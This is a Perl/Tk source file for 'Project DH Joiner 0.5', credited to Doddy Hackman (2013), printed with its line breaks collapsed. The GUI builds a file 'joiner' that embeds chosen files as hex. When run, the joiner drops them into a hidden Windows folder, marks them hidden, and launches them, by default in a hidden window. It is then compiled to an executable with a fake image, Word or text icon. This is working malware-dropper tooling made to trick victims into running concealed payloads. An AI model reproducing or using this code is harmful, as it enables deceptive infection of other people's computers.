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#!usr/bin/perl#Project DH Joiner 0.5#(C) Doddy Hackman 2013use Tk;use Tk::PNG;use Tk::FileSelect;use Win32;use Cwd;use File::Basename;my $color_fondo = "black";my $color_texto = "green";if ( $^O eq 'MSWin32' ) { use Win32::Console; Win32::Console::Free();}my $gen = MainWindow->new( -background => $color_fondo );$gen->title("Project DH Joiner 0.5 (C) Doddy Hackman 2013");$gen->geometry("400x640+20+20");$gen->resizable( 0, 0 );my $in = $gen->Photo( -file => "logo.png", -format => "png" );$gen->Label( -image => $in, -borderwidth => 0 )->pack();$gen->Label( -text => "-- == Files == --", -font => "Impact", -background => $color_fondo, -foreground => $color_texto)->place( -x => 140, -y => 100 );$gen->Label( -text => "Filename", -font => "Impact", -background => $color_fondo, -foreground => $color_texto)->place( -x => 55, -y => 140 );my $lista_nombres = $gen->Listbox( -height => 10, -width => 15, -background => $color_fondo, -foreground => $color_texto)->place( -y => 170, -x => 40 );$gen->Label( -text => "File", -font => "Impact", -background => $color_fondo, -foreground => $color_texto)->place( -x => 180, -y => 140 );my $lista_rutas = $gen->Listbox( -height => 10, -width => 20, -background => $color_fondo, -foreground => $color_texto)->place( -y => 170, -x => 150 );$gen->Label( -text => "Type", -font => "Impact", -background => $color_fondo, -foreground => $color_texto)->place( -x => 300, -y => 140 );my $lista_tipo = $gen->Listbox( -height => 10, -width => 10, -background => $color_fondo, -foreground => $color_texto)->place( -y => 170, -x => 290 );$gen->Label( -text => "-- == Add Files == --", -font => "Impact", -background => $color_fondo, -foreground => $color_texto)->place( -x => 130, -y => 330 );$gen->Label( -text => "File : ", -font => "Impact", -background => $color_fondo, -foreground => $color_texto)->place( -x => 20, -y => 370 );my $add_file = $gen->Entry( -width => 30, -background => $color_fondo, -foreground => $color_texto)->place( -x => 55, -y => 375 );$gen->Button( -text => "Browse", -command => \&mostrarfile, -width => 8, -background => $color_fondo, -foreground => $color_texto, -activebackground => $color_texto)->place( -x => 245, -y => 375 );$gen->Button( -text => "Add", -command => \&add_now, -width => 8, -background => $color_fondo, -foreground => $color_texto, -activebackground => $color_texto)->place( -x => 305, -y => 375 );$gen->Label( -text => "Type : ", -font => "Impact", -background => $color_fondo, -foreground => $color_texto)->place( -x => 20, -y => 400 );my $t = $gen->Radiobutton( -text => "Hidden", -value => "Hidden", -variable => \$op_ti, -background => $color_fondo, -foreground => $color_texto, -activebackground => $color_texto)->place( -x => 65, -y => 405 );$t->select;$gen->Radiobutton( -text => "Show", -value => "Show", -variable => \$op_ti, -background => $color_fondo, -foreground => $color_texto, -activebackground => $color_texto)->place( -x => 125, -y => 405 );$gen->Label( -text => "-- == Options == --", -font => "Impact", -background => $color_fondo, -foreground => $color_texto)->place( -x => 130, -y => 435 );$gen->Label( -text => "Directory to hide : ", -font => "Impact", -background => $color_fondo, -foreground => $color_texto)->place( -x => 20, -y => 470 );my $dir_hide = $gen->Entry( -text => "C:/WINDOWS/sexnow", -width => 30, -background => $color_fondo, -foreground => $color_texto)->place( -x => 140, -y => 475 );$gen->Checkbutton( -text => "Hide Files", -font => "Impact", -variable => \$hide_op, -background => $color_fondo, -foreground => $color_texto, -activebackground => $color_texto)->place( -x => 20, -y => 500 );$gen->Label( -text => "Icon : ", -font => "Impact", -background => $color_fondo, -foreground => $color_texto)->place( -x => 20, -y => 530 );my $h = $gen->Radiobutton( -text => "Image", -value => "Image", -variable => \$op_i, -background => $color_fondo, -foreground => $color_texto, -activebackground => $color_texto)->place( -x => 65, -y => 535 );$h->select;$gen->Radiobutton( -text => "Word", -value => "Word", -variable => \$op_i, -background => $color_fondo, -foreground => $color_texto, -activebackground => $color_texto)->place( -x => 125, -y => 535 );$gen->Radiobutton( -text => "TXT", -value => "TXT", -variable => \$op_i, -background => $color_fondo, -foreground => $color_texto, -activebackground => $color_texto)->place( -x => 180, -y => 535 );$gen->Button( -command => \&generatenow, -text => "Generate!", -font => "Impact", -background => $color_fondo, -foreground => $color_texto, -width => 30, -activebackground => $color_texto)->place( -x => 75, -y => 580 );MainLoop;sub generatenow { my @nombres; my @rutas; my @tipos; my $total = $lista_nombres->size - 1; for my $number ( 0 .. $total ) { my $linkar = $lista_nombres->get($number); push( @nombres, $linkar ); } my $total = $lista_rutas->size - 1; for my $number ( 0 .. $total ) { my $linkar = $lista_rutas->get($number); push( @rutas, $linkar ); } my $total = $lista_tipo->size - 1; for my $number ( 0 .. $total ) { my $linkar = $lista_tipo->get($number); push( @tipos, $linkar ); }## Source unlink("joiner.pl"); unlink("joiner.exe"); my $total = int(@nombres); my $linea_mods; my $vars; my $linea_hides; my $linea_archivos; my $th_inicios; my $th_joins; my $th_cmd; my $cmds; $linea_mods .= "use Win32;\n"; $linea_mods .= "use Win32::Job;\n"; $linea_mods .= "use Win32::File;\n"; $linea_mods .= "use threads;\n\n"; $linea_mods .= "if ($^O eq 'MSWin32') {use Win32::Console;Win32::Console::Free();}\n\n"; my $vars = 'my $dir_hide = "' . $dir_hide->get . '";my $hide_op = "' . $hide_op . '";'; my $makedir_code = 'unless (-d $dir_hide) {mkdir($dir_hide,777);chdir($dir_hide);}else {chdir($dir_hide);}' . "\n"; for my $num ( 0 .. $total - 1 ) { my $nombress = $nombres[$num]; my $ruta = $rutas[$num]; my $code_crear = ""; my $hex = unpack "H*", getcontent($ruta); $linea_archivos .= "open(GENNOW,'>>'.'$nombress');\n"; $linea_archivos .= "binmode(GENNOW);\n"; $linea_archivos .= 'my $hex_now ' . "= pack 'H*','$hex';\n"; $linea_archivos .= 'print GENNOW $hex_now;' . "\n"; $linea_archivos .= "close GENNOW;\n"; } if ( $hide_op eq 1 ) { my $dir_hide = $dir_hide->get; for my $num ( 0 .. $total - 1 ) { my $nombress = $nombres[$num]; $linea_hides .= "hideit('$nombress','hide');\n"; } $linea_hides .= "hideit('$dir_hide','hide');\n"; } for my $num ( 0 .. $total - 1 ) { $th_inicios .= 'my $comando' . $num . ' = threads->new(\&fun_' . $num . ');' . "\n"; } for my $num ( 0 .. $total - 1 ) { $th_joins .= '$comando' . $num . '->join();' . "\n"; } for my $num ( 0 .. $total - 1 ) { my $nombress = $nombres[$num]; my $ruta = $rutas[$num]; my $tipos = $tipos[$num]; $th_cmd .= "sub fun_" . $num . " {\n"; if ( $tipos eq "Show" ) { $th_cmd .= "cargar_normal(\"$nombress\");\n"; } else { $th_cmd .= "cargar_hide(\"$nombress\");\n"; } $th_cmd .= "}\n"; } my $cmds = 'sub cargar_normal {system($_[0]);} sub cargar_hide { my $job = Win32::Job->new;$job->spawn("cmd",qq{cmd /C $_[0]},{no_window =>"true"}); $ok = $job->run("30");}sub hideit {if ($_[1] eq "show") {Win32::File::SetAttributes($_[0],NORMAL);}elsif ($_[1] eq "hide") {Win32::File::SetAttributes($_[0],HIDDEN);}}'; open( JOINER, ">>joiner.pl" ); print JOINER "#!usr/bin/perl\n"; print JOINER "#DH Joiner 0.5 (C) Doddy Hackman 2013\n\n"; print JOINER $linea_mods; print JOINER $vars . "\n"; print JOINER $makedir_code . "\n"; print JOINER $linea_archivos . "\n"; print JOINER $linea_hides . "\n"; print JOINER $th_inicios . "\n"; print JOINER $th_joins . "\n"; print JOINER $th_cmd . "\n"; print JOINER $cmds . "\n"; print JOINER "\n#The End ?"; close JOINER; sub getcontent { open( FILE, $_[0] ); binmode(FILE); my @lines = <FILE>; close FILE; $code = join "", @lines; return $code; }#### PERL2EXE chdir( getcwd() ); unlink( getcwd() . "/PERL2EXE/joiner.pl" ); unlink( getcwd() . "/PERL2EXE/joiner.exe" ); Win32::CopyFile( "joiner.pl", getcwd() . "/PERL2EXE/joiner.pl", 0 ); chdir( getcwd() . "/PERL2EXE" ); if ( $op_i eq "Image" ) { system("perl2exe -icon=image.ico joiner.pl"); } elsif ( $op_i eq "Word" ) { system("perl2exe -icon=doc.ico joiner.pl"); } elsif ( $op_i eq "TXT" ) { system("perl2exe -icon=txt.ico joiner.pl"); } else { system("perl2exe -icon=image.ico joiner.pl"); }#### Copy Win32::CopyFile( "joiner.exe", "../" . "joiner.exe", 0 );#### End $gen->Dialog( -title => "Information", -buttons => ["OK"], -text => "Joiner Ready", -background => $color_fondo, -foreground => $color_texto, -activebackground => $color_texto )->Show();##}sub add_now { $lista_nombres->insert( "end", basename( $add_file->get ) ); $lista_rutas->insert( "end", $add_file->get ); unless ( $op_ti eq "" ) { $lista_tipo->insert( "end", $op_ti ); } else { $lista_tipo->insert( "end", "Show" ); }}sub mostrarfile { $browse = $gen->FileSelect( -directory => getcwd() ); my $filea = $browse->Show; $add_file->configure( -text => $filea );}#The End ?